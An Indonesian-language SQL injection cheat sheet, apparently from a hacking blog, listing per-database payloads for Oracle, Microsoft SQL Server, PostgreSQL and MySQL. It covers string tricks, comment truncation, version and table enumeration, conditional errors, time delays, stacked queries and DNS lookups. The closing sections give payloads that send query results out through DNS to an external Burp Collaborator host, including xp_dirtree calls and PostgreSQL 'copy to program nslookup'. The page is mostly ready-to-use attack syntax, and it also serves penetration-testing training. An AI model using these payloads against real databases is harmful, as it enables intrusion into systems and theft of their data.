SQL injection cheat sheet

SQL injection cheat sheet ini berisi contoh sintaks berguna yang dapat Anda gunakan untuk melakukan berbagai tugas yang sering muncul saat melakukan serangan injeksi SQL.

Rangkaian string

Anda dapat menyatukan beberapa string untuk membuat satu string.

Oracle'foo'||'bar'
Microsoft'foo'+'bar'
PostgreSQL'foo'||'bar'
MySQL'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')

Substring

Anda dapat mengekstraksi bagian string, dari offset tertentu dengan panjang tertentu. Perhatikan bahwa indeks offset berbasis 1. Setiap ekspresi berikut akan mengembalikan string ba.

OracleSUBSTR('foobar', 4, 2)
MicrosoftSUBSTRING('foobar', 4, 2)
PostgreSQLSUBSTRING('foobar', 4, 2)
MySQLSUBSTRING('foobar', 4, 2)

Comments

Anda dapat menggunakan komentar untuk memotong kueri dan menghapus bagian dari kueri asli yang mengikuti input Anda.

Oracle--comment
Microsoft--comment
/*comment*/
PostgreSQL--comment
/*comment*/
MySQL#comment
-- comment [Note the space after the double dash]
/*comment*/

Database version

Anda dapat meminta basis data untuk menentukan jenis dan versinya. Informasi ini berguna ketika merumuskan serangan yang lebih rumit.

BACA  4 Metode Umum Cybercrime Yang Harus Anda Ketahui
OracleSELECT banner FROM v$version
SELECT version FROM v$instance
MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version

Database contents

Anda bisa daftar tabel yang ada di database, dan kolom yang berisi tabel tersebut.

OracleSELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
MicrosoftSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQLSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQLSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Conditional errors

Anda dapat menguji kondisi boolean tunggal dan memicu kesalahan basis data jika kondisinya benar.

OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
MicrosoftSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQLSELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

Batched (or stacked) queries

Anda bisa menggunakan kueri batched untuk menjalankan beberapa kueri berturut-turut. Perhatikan bahwa sementara kueri berikutnya dieksekusi, hasilnya tidak dikembalikan ke aplikasi. Karenanya teknik ini terutama digunakan dalam kaitannya dengan kerentanan buta di mana Anda dapat menggunakan kueri kedua untuk memicu pencarian DNS, kesalahan kondisional, atau penundaan waktu.

BACA  Cara Membuat Virus Computer dengan NotePad
OracleDoes not support batched queries.
MicrosoftQUERY-1-HERE; QUERY-2-HERE
PostgreSQLQUERY-1-HERE; QUERY-2-HERE
MySQLDoes not support batched queries.

Time delays

Anda dapat menyebabkan waktu tunda dalam database ketika permintaan diproses. Berikut ini akan menyebabkan penundaan waktu tanpa syarat 10 detik.

Oracledbms_pipe.receive_message(('a'),10)
MicrosoftWAITFOR DELAY '0:0:10'
PostgreSQLSELECT pg_sleep(10)
MySQLSELECT sleep(10)

Conditional time delays

Anda dapat menguji kondisi boolean tunggal dan memicu waktu tunda jika kondisinya benar.

OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
MicrosoftIF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQLSELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

DNS lookup

Anda dapat menyebabkan database melakukan pencarian DNS ke domain eksternal. Untuk melakukan ini, Anda harus menggunakan klien Burp Collaborator untuk menghasilkan subdomain Burp Collaborator unik yang akan Anda gunakan dalam serangan Anda, dan kemudian polling server Collaborator untuk mengonfirmasi bahwa pencarian DNS terjadi.

OracleThe following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dualThe following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')
Microsoftexec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'
PostgreSQLcopy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'
MySQLThe following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

DNS lookup with data exfiltration

Anda dapat menyebabkan database melakukan pencarian DNS ke domain eksternal yang berisi hasil dari kueri yang disuntikkan. Untuk melakukan ini, Anda harus menggunakan klien Burp Collaborator untuk menghasilkan subdomain Burp Collaborator unik yang akan Anda gunakan dalam serangan Anda, dan kemudian polling server Collaborator untuk mengambil detail dari setiap interaksi DNS, termasuk data yang di-exfiltrated.

BACA  Tools hacking terbaik 2020
OracleSELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual
Microsoftdeclare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')
PostgreSQLcreate OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQLThe following technique works on Windows only:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

Live Hacking

Admin website indoxploit.id

Tinggalkan Balasan